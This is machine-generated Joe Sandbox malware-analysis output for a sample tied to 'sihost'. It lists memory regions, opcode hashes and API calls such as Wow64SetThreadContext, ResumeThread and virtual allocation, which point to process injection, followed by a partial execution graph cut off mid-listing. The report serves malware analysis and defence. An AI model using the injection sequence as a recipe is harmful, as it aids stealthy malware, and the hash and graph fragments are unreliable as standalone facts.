                                      • Snapshot File: hcaresult_12_2_510000_sihost.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: d995c26474419719689178a22ee8b037ee66ddc10cf28d5b254fe221ba4cebd7
                                      • Instruction ID: 8b2375736c2590b8a03618bcee732c81ed42553301847743c8d75a400cdf5373
                                      • Opcode Fuzzy Hash: d995c26474419719689178a22ee8b037ee66ddc10cf28d5b254fe221ba4cebd7
                                      • Instruction Fuzzy Hash: DB4198B8D002589FCF10CFA9D984AEEFBB1BB49310F20942AE814B7314D775A946CF65
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 005192D7
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.456253898.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_510000_sihost.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 0faabf7e172b0fe0cbd3634841f41d2d233e133a3309369d4bffad975ee0492d
                                      • Instruction ID: 2524fcc53a1efdc176534f5cd9ed3bb7e1f473258ea1921085f2b0442780121d
                                      • Opcode Fuzzy Hash: 0faabf7e172b0fe0cbd3634841f41d2d233e133a3309369d4bffad975ee0492d
                                      • Instruction Fuzzy Hash: E541BCB4D012599FDB10CFA9D984AEEFFF1BB49314F24842AE414B7244C7389985CF64
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 005192D7
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.456253898.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_510000_sihost.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: fa5be3581c9f277b58ae41bbd6a08448067c4b556e956a8ab052f2b36fa6fb3c
                                      • Instruction ID: 8dd91bd48b95a75d1ebcd70b8477e6b33860757eb565c4e7e66ae9e831426b79
                                      • Opcode Fuzzy Hash: fa5be3581c9f277b58ae41bbd6a08448067c4b556e956a8ab052f2b36fa6fb3c
                                      • Instruction Fuzzy Hash: 8941ACB4D002599FDB10CFAAD884AEEFFF1BB49314F24842AE414B7244D739A985CF54
                                      APIs
                                      • ResumeThread.KERNELBASE(?), ref: 005191B6
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.456253898.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_510000_sihost.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 40f9e16cbe196754f39d146c43f1d8712fdfbde899038dd708fb841f0ee6f8dc
                                      • Instruction ID: cd58926bf774a631b89b48f4ee399b8d71ce887e5f247b3b5c81f941e93ebbf5
                                      • Opcode Fuzzy Hash: 40f9e16cbe196754f39d146c43f1d8712fdfbde899038dd708fb841f0ee6f8dc
                                      • Instruction Fuzzy Hash: 6F31CAB4D00249AFCF10CFA9D884AEEFBB1AB49314F24846AE815B7340C735A945CF94
                                      APIs
                                      • ResumeThread.KERNELBASE(?), ref: 005191B6
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.456253898.0000000000510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00510000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_510000_sihost.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 0233ad2cd06d93e8ba28b4253be0e88bd321ade50e0e136f04c369f5759d4247
                                      • Instruction ID: 0be83f09eb1db5c182433efbdb9964e5d2604372bb55bb3210690fbdb6287ab6
                                      • Opcode Fuzzy Hash: 0233ad2cd06d93e8ba28b4253be0e88bd321ade50e0e136f04c369f5759d4247
                                      • Instruction Fuzzy Hash: F131B9B4D00219AFCF10CFAAD984AEEFBB5BB49314F24942AE815B7300D735A945CF94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,?
                                      • API String ID: 0-3465434220
                                      • Opcode ID: a28705067995d0b66dceecf863ebad3a5313e6892a4fd3efc2a27693891c9fc3
                                      • Instruction ID: 1fa5cc3f3153a21593c13d805c7736f8086cd6e7592bef432efd04fd11d89e4f
                                      • Opcode Fuzzy Hash: a28705067995d0b66dceecf863ebad3a5313e6892a4fd3efc2a27693891c9fc3
                                      • Instruction Fuzzy Hash: A0419034A002489FC71AEFA8C44599EBBF1AF41301F45C1DAD5499F363DB34CE598B89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep
                                      • API String ID: 0-914316021
                                      • Opcode ID: 5663bec6ceea4d6ed1807096c55b8b40bd22f54f762d80719a052f98382a2e9c
                                      • Instruction ID: 4eab662bfb20841f0f3869a372c5cafa8a55206f89ec7ad5c66744cac4f6ad16
                                      • Opcode Fuzzy Hash: 5663bec6ceea4d6ed1807096c55b8b40bd22f54f762d80719a052f98382a2e9c
                                      • Instruction Fuzzy Hash: B0012B30A245809FDB2C9BB884697BE7EA25BC4301F14046EEC039B3D3CD6C4C0AC75A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: L
                                      • API String ID: 0-2909332022
                                      • Opcode ID: 8b9c73bbe038e381fa78dfc02a89744c7aeea8206796ababc0ebb802366224c6
                                      • Instruction ID: 9802f8ffb02a3625e77127d3054a40b0a56921a7ea1d5f2b09f2238ea68ef2f8
                                      • Opcode Fuzzy Hash: 8b9c73bbe038e381fa78dfc02a89744c7aeea8206796ababc0ebb802366224c6
                                      • Instruction Fuzzy Hash: FCF0273131D7808FC7466B346C185AD3F62AF53244B0941EBD886C73A7DE658806C74A
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 046fe74675ee447e5e1fb5c5cf49dcc96ce9769a0d6c04636a3e7103955b1c6b
                                      • Instruction ID: 9125d27c914f6c58c933eacc7c53b6026e7571040fe2fe5100c6bca4895d7655
                                      • Opcode Fuzzy Hash: 046fe74675ee447e5e1fb5c5cf49dcc96ce9769a0d6c04636a3e7103955b1c6b
                                      • Instruction Fuzzy Hash: 3831B22512D6CD6FCB938F308C295E53F60EE03601B1896CFDCDA4A183D559A70EDB4A
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 57e880aaa6bee929acec1f7ee205db9452665d7c16c407b574a9be46ac453f4b
                                      • Instruction ID: d2138433b9fe8c200a6de88744c6f620b146d78da330094ee6d9ef99c6c624c9
                                      • Opcode Fuzzy Hash: 57e880aaa6bee929acec1f7ee205db9452665d7c16c407b574a9be46ac453f4b
                                      • Instruction Fuzzy Hash: 1E417170A11209EFCB48CFAAD98489EFBB1FB88302F20D8A6C44597365D734DB15CB09
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d79e4ecf268cb7c3307c74ce7acdab14e17600247c312ca9f0964d6e31c9af91
                                      • Instruction ID: 94bf139d840e6357c34ac8d2a852ffc0f55a45d13a386c08f4901a5f3dd6b492
                                      • Opcode Fuzzy Hash: d79e4ecf268cb7c3307c74ce7acdab14e17600247c312ca9f0964d6e31c9af91
                                      • Instruction Fuzzy Hash: 1A312534D10208DFC716EF98C549A9EBBB1AF41305F15C1AAD1499F326D735CA88CB45
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455389337.00000000003FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 003FD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_3fd000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d62b314a50793d12debd449bbaa2c488ad25670c95883a71892a0914a81eb837
                                      • Instruction ID: e1c8bc08b9749eca13f50a5ac7629e11bdcc5ab9a4f6eba0e0a5eb0b4fbb3e4f
                                      • Opcode Fuzzy Hash: d62b314a50793d12debd449bbaa2c488ad25670c95883a71892a0914a81eb837
                                      • Instruction Fuzzy Hash: 3F210371604245EFDB16CF14D888B26BB66EB84314F20C569E9094B246CB36D807CB61
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455389337.00000000003FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 003FD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_3fd000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7259144e53eb01335a0e03e84b9da91d0fc92e572ff2013641715279c1651141
                                      • Instruction ID: e079dd7402f0c4928ecdfb5b608fb7c00b80f23beb81987d30a522876a47620d
                                      • Opcode Fuzzy Hash: 7259144e53eb01335a0e03e84b9da91d0fc92e572ff2013641715279c1651141
                                      • Instruction Fuzzy Hash: 4721F571604248EFDB02CF14D9C8B36BB66FB84314F24C969E9494B256C336D846CBA1
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455389337.00000000003FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 003FD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_3fd000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cdf7dd3794d067d16b4ae7a7134edf91886693b89e3f1fe336767d5f34ce4921
                                      • Instruction ID: c635b53e57fb04818737ec519d60556d016362e67a04ab337e366062756aaf7f
                                      • Opcode Fuzzy Hash: cdf7dd3794d067d16b4ae7a7134edf91886693b89e3f1fe336767d5f34ce4921
                                      • Instruction Fuzzy Hash: 3A218E755093848FDB03CF24D994715BF72EB46314F29C5EAD8498F2A7C33A980ACB62
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 31bcd40e186006706a212cb6ca07cc1db2414989bd1931fd0e32f3e8c53f0eb4
                                      • Instruction ID: 678df3a03cfb870340ddaabcc280b5f84f20c68648a6bb300afdbd190e2f9637
                                      • Opcode Fuzzy Hash: 31bcd40e186006706a212cb6ca07cc1db2414989bd1931fd0e32f3e8c53f0eb4
                                      • Instruction Fuzzy Hash: C511F674E04208EFCB44DFA9C985A9EBBF2EF88301F14C5AAD4189B365D730DA018B44
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455389337.00000000003FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 003FD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_3fd000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                      • Instruction ID: 08c08369cf6518ebfcc82a1e11c8b648b2de19cc3c78e8a1310829dad793b8f7
                                      • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                      • Instruction Fuzzy Hash: 34118E75504244DFDB12CF14D5C4B25BB62FB84314F24CAAED9494B656C33AD84ACBA1
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3c57c84d23a1d8e9a91e3b8c3bcb3ea181e9273ee1f0d3854699cd7bf2a2ca35
                                      • Instruction ID: 7c3576c5609b349a8f279f169d48c96b7f4d5f95efcb2ed3f6918f9f7f6b4bc9
                                      • Opcode Fuzzy Hash: 3c57c84d23a1d8e9a91e3b8c3bcb3ea181e9273ee1f0d3854699cd7bf2a2ca35
                                      • Instruction Fuzzy Hash: 2601C470905388DFCB02EF64D9567AD7B719F45300B5085EBC8098F667D6394E0ACB41
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8f41e429d2ca0fafb3dd468b6591cd157d465ea070daf281f838e90805d6b73f
                                      • Instruction ID: 15f253aa42e9c34eabc0d5ca2666936e9ff3abb32d0bb10ba0102222e4e81b77
                                      • Opcode Fuzzy Hash: 8f41e429d2ca0fafb3dd468b6591cd157d465ea070daf281f838e90805d6b73f
                                      • Instruction Fuzzy Hash: 09115B75D002599FCB10DFA9D950AEEBBF5FF88301F10806AE914A7381D738AA40CFA5
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f310d01cd5c4f2f1dba926cd7d31a10e69a819d38e94b03c1a2c1ddc3e9a53f8
                                      • Instruction ID: a4e614028797b590dca7f956c7959de6fc8dde6e7d0f66c2d569b7719b3551db
                                      • Opcode Fuzzy Hash: f310d01cd5c4f2f1dba926cd7d31a10e69a819d38e94b03c1a2c1ddc3e9a53f8
                                      • Instruction Fuzzy Hash: 66010075D0020CDFCB42EFE8C9516DEFFB5EF48300F1089AAD115AB354EA309A059B81
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7893bcf4dd5400f5978caf9913eac899ac507103a26729dc1f524d3433c3f549
                                      • Instruction ID: ab0911564e193ac35c73e3c5fee96eb6cd91ce028ec9ad884850efc67e2a8b75
                                      • Opcode Fuzzy Hash: 7893bcf4dd5400f5978caf9913eac899ac507103a26729dc1f524d3433c3f549
                                      • Instruction Fuzzy Hash: F6E092CA05D3AC90C67B63B8A05225E6E08AC027A73850B57DC946545F0E0D898D432F
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 89cf27d939bc79b57e0163006a33cc675f50c730cd34210de76d77ec20d10002
                                      • Instruction ID: 6362a9e4e1663b4de3d10723fed6d10cd8ce06bff8348bb86da05fe55499ee00
                                      • Opcode Fuzzy Hash: 89cf27d939bc79b57e0163006a33cc675f50c730cd34210de76d77ec20d10002
                                      • Instruction Fuzzy Hash: FB01A930510754CBC715EB35C44079D77B36FC6305F504A9ED40A1B252EF789A8A8B57
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4c700c4de470ed52be710780929b8ba9c92dfc2849b0728b670e394196172235
                                      • Instruction ID: 9b3b947a1b411554acf422dc0406e707b4032cd62ca926d66584f3834b277e90
                                      • Opcode Fuzzy Hash: 4c700c4de470ed52be710780929b8ba9c92dfc2849b0728b670e394196172235
                                      • Instruction Fuzzy Hash: C2E0C239320610CFC794BB30B81887D7BA2BFDA25171441ADEC07C3369DE7288028B89
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 17a85d15740436b0da79ed8e74ff1ede88e28dcd2fcf96f7f5818a31f443e692
                                      • Instruction ID: 3523b2695aff758432fd0ddf1b271ff5014a6caa81fb19f81dc45aa3f60dfbc8
                                      • Opcode Fuzzy Hash: 17a85d15740436b0da79ed8e74ff1ede88e28dcd2fcf96f7f5818a31f443e692
                                      • Instruction Fuzzy Hash: C4D012B4A0134CEFCB01EFB9D90656E77B9DB44304B5145B9D80997206DA716F049B85
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9070e0ac2341d8102ef5fc453500007238ea07a99c55e0c6b0d0f623c048af9d
                                      • Instruction ID: 93188f9cb93fd0808de29056d31bfa47172417cb65fa5465a56f50f228a6093b
                                      • Opcode Fuzzy Hash: 9070e0ac2341d8102ef5fc453500007238ea07a99c55e0c6b0d0f623c048af9d
                                      • Instruction Fuzzy Hash: 7BD02235702B2C63822EF62F10002AEB1CE8F82792B40882FF80D83213FD185C0502CE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 523ec346e62ba9af02aee02c989c1d76520ac08825d0be0a2dd8c7e68d4c394c
                                      • Instruction ID: 352cbffd7cc883992334ce4a9190c8bba113bf92ccdabc8dc510d7b1b3667033
                                      • Opcode Fuzzy Hash: 523ec346e62ba9af02aee02c989c1d76520ac08825d0be0a2dd8c7e68d4c394c
                                      • Instruction Fuzzy Hash: 55E04235A012148FDB59DB24DA58B69BBF2AF49201F0540E5E90AD7362DBB49E84CF0A
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 320db03fed96a3bcc45c91b0a41f9c9050fee1371288b03b809ea0db955f333b
                                      • Instruction ID: d3ce598cdc4573bda24dfaf8d468753bd41c33556c5ed4fa1ac10b4791a64e68
                                      • Opcode Fuzzy Hash: 320db03fed96a3bcc45c91b0a41f9c9050fee1371288b03b809ea0db955f333b
                                      • Instruction Fuzzy Hash: CDC01231401218ABD750EFB99809B1A7B98D709243F0080A5D80883210E67149108A5A
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.455694364.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_450000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3e6998a7cd19dff40f625a9390158f5190c13ef4dc4604341fc7ee4fe6e06015
                                      • Instruction ID: b1ac71f8d35ed4a0c9ea92c1735bdc9cb084674fb9da5937584c4511186db6e8
                                      • Opcode Fuzzy Hash: 3e6998a7cd19dff40f625a9390158f5190c13ef4dc4604341fc7ee4fe6e06015
                                      • Instruction Fuzzy Hash: 58C092A404DB908FCB575B608A285827F31BE0270B399C4EBC0C8CE1A7D6E74807C3A6

                                      Execution Graph

                                      Execution Coverage:6.5%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:18.6%
                                      Total number of Nodes:59
                                      Total number of Limit Nodes:0
                                      execution_graph 33941 365500 33942 36550c 33941->33942 33953 369300 33942->33953 33944 3657d4 33975 4b4330 33944->33975 33945 3658e5 33981 4a9960 33945->33981 33987 4a9950 33945->33987 33946 365c18 33955 369332 33953->33955 33954 3655ab 33963 498739 33954->33963 33969 498748 33954->33969 33955->33954 33993 36e573 33955->33993 33997 36e180 33955->33997 34001 36e190 33955->34001 33956 369483 KiUserExceptionDispatcher 33957 3693fe 33956->33957 33957->33954 33957->33956 34005 672c73 33957->34005 34009 672ad8 33957->34009 33964 498748 33963->33964 33965 49883d 33964->33965 33966 36e573 LdrInitializeThunk 33964->33966 33967 36e190 LdrInitializeThunk 33964->33967 33968 36e180 LdrInitializeThunk 33964->33968 33965->33944 33966->33965 33967->33965 33968->33965 33970 49876a 33969->33970 33971 49883d 33970->33971 33972 36e573 LdrInitializeThunk 33970->33972 33973 36e190 LdrInitializeThunk 33970->33973 33974 36e180 LdrInitializeThunk 33970->33974 33971->33944 33972->33971 33973->33971 33974->33971 33976 4b434c 33975->33976 33977 4b43f7 33976->33977 33978 36e573 LdrInitializeThunk 33976->33978 33979 36e190 LdrInitializeThunk 33976->33979 33980 36e180 LdrInitializeThunk 33976->33980 33977->33945 33978->33977 33979->33977 33980->33977 33982 4a997c 33981->33982 33983 4a9a27 33982->33983 33984 36e573 LdrInitializeThunk 33982->33984 33985 36e190 LdrInitializeThunk 33982->33985 33986 36e180 LdrInitializeThunk 33982->33986 33983->33946 33984->33983 33985->33983 33986->33983 33988 4a9960 33987->33988 33989 4a9a27 33988->33989 33990 36e573 LdrInitializeThunk 33988->33990 33991 36e190 LdrInitializeThunk 33988->33991 33992 36e180 LdrInitializeThunk 33988->33992 33989->33946 33990->33989 33991->33989 33992->33989 33995 36e42b LdrInitializeThunk 33993->33995 33996 36e6c8 33995->33996 33996->33957 33999 36e190 33997->33999 33998 36e321 33998->33957 33999->33998 34000 36e6b0 LdrInitializeThunk 33999->34000 34000->33998 34004 36e1c1 34001->34004 34002 36e321 34002->33957 34003 36e6b0 LdrInitializeThunk 34003->34002 34004->34002 34004->34003 34008 672b37 34005->34008 34006 672c2a KiUserExceptionDispatcher 34007 672c1b 34006->34007 34007->33957 34008->34006 34008->34007 34012 672aff 34009->34012 34010 672c2a KiUserExceptionDispatcher 34011 672c1b 34010->34011 34011->33957 34012->34010 34012->34011

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 9d6e90-9d6ebb 1 9d6ebd 0->1 2 9d6ec2-9d6f40 0->2 1->2 4 9d72b5-9d7316 2->4 5 9d6f46-9d7056 2->5 11 9d731c-9d7351 4->11 12 9d7661-9d79b6 4->12 35 9d7058-9d7064 5->35 36 9d7080 5->36 25 9d735b-9d7361 11->25 128 9d79cf-9d79e0 12->128 129 9d79b8-9d79cd 12->129 27 9d736c-9d757a 25->27 101 9d757c-9d7591 27->101 102 9d7593-9d75a4 27->102 40 9d706e-9d7074 35->40 41 9d7066-9d706c 35->41 38 9d7086-9d726b 36->38 109 9d726d-9d7279 38->109 110 9d727a 38->110 43 9d707e 40->43 41->43 43->38 108 9d75a5-9d75d7 101->108 102->108 117 9d75e1-9d75f3 108->117 109->110 110->4 119 9d75fe-9d760a 117->119 121 9d7611-9d761e 119->121 123 9d7626-9d7660 121->123 123->12 132 9d79e1-9d7acd 128->132 129->132 142 9d7ffd-9d8031 132->142 143 9d7ad3-9d7bdd 132->143 146 9d8037-9d8285 142->146 147 9d8286-9d82ba 142->147 179 9d7dc1-9d7ddb 143->179 180 9d7be3-9d7dbc 143->180 146->147 152 9d83cc 147->152 153 9d82c0-9d83cb 147->153 154 9d83cd-9d83d4 152->154 153->152 191 9d7de5-9d7df9 call 9d83d8 179->191 242 9d7ffc 180->242 195 9d7dff-9d7e28 191->195 202 9d7e32-9d7e42 call 9d8430 195->202 205 9d7e48-9d7f66 202->205 238 9d7f71 205->238 241 9d7f7c-9d7f91 238->241 243 9d7f9c-9d7fc6 call 9d8490 call 9d84ea 241->243 242->142 245 9d7fcc-9d7fce 243->245 245->154 245->242
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep$Tep$ds$Gs$Gs
                                      • API String ID: 0-3665057645
                                      • Opcode ID: dd348d91b2d9c59f9e4fdea54ae5c9429a1db646dd503bc0e484cf4656626c6d
                                      • Instruction ID: 074e22393c4cc2e6f778d5e22f3cefff1ecc5b82e5abcc8162a5751e67c511be
                                      • Opcode Fuzzy Hash: dd348d91b2d9c59f9e4fdea54ae5c9429a1db646dd503bc0e484cf4656626c6d
                                      • Instruction Fuzzy Hash: 99C2B774A01228CFDB65DF64C894BADB7B2FB89304F2095EAD80967359DB359E81CF40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: B
                                      • API String ID: 0-1255198513
                                      • Opcode ID: 7d1e1a486b90388a0eac35d2bd1e0acefbc58c951302c93b8dbb829025262fb3
                                      • Instruction ID: 663ebfedc68da6cc263eeef9415ca236e7c68ae7c7deb3d94206882ef041cdc6
                                      • Opcode Fuzzy Hash: 7d1e1a486b90388a0eac35d2bd1e0acefbc58c951302c93b8dbb829025262fb3
                                      • Instruction Fuzzy Hash: 6553F431D10B5A8ECB11EF68C884A99F7B1FF95300F55C69AE44977221EB70AAD4CF42

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2657 36e190-36e1bf 2658 36e1c6-36e25c 2657->2658 2659 36e1c1 2657->2659 2661 36e2fb-36e301 2658->2661 2659->2658 2662 36e307-36e31f 2661->2662 2663 36e261-36e274 2661->2663 2664 36e333-36e346 2662->2664 2665 36e321-36e32e 2662->2665 2666 36e276 2663->2666 2667 36e27b-36e2cc 2663->2667 2668 36e34d-36e369 2664->2668 2669 36e348 2664->2669 2670 36e6c8-36e7c4 2665->2670 2666->2667 2683 36e2ce-36e2dc 2667->2683 2684 36e2df-36e2f1 2667->2684 2672 36e370-36e394 2668->2672 2673 36e36b 2668->2673 2669->2668 2675 36e7c6-36e7cb 2670->2675 2676 36e7cc-36e7d6 2670->2676 2679 36e396 2672->2679 2680 36e39b-36e3cd 2672->2680 2673->2672 2675->2676 2679->2680 2689 36e3d4-36e416 2680->2689 2690 36e3cf 2680->2690 2683->2662 2686 36e2f3 2684->2686 2687 36e2f8 2684->2687 2686->2687 2687->2661 2692 36e41d-36e426 2689->2692 2693 36e418 2689->2693 2690->2689 2694 36e64d-36e653 2692->2694 2693->2692 2695 36e42b-36e450 2694->2695 2696 36e659-36e66c 2694->2696 2697 36e457-36e48d 2695->2697 2698 36e452 2695->2698 2699 36e673-36e68e 2696->2699 2700 36e66e 2696->2700 2708 36e494-36e4c6 2697->2708 2709 36e48f 2697->2709 2698->2697 2701 36e695-36e6a9 2699->2701 2702 36e690 2699->2702 2700->2699 2705 36e6b0-36e6c6 LdrInitializeThunk 2701->2705 2706 36e6ab 2701->2706 2702->2701 2705->2670 2706->2705 2711 36e52a-36e53d 2708->2711 2712 36e4c8-36e4ed 2708->2712 2709->2708 2715 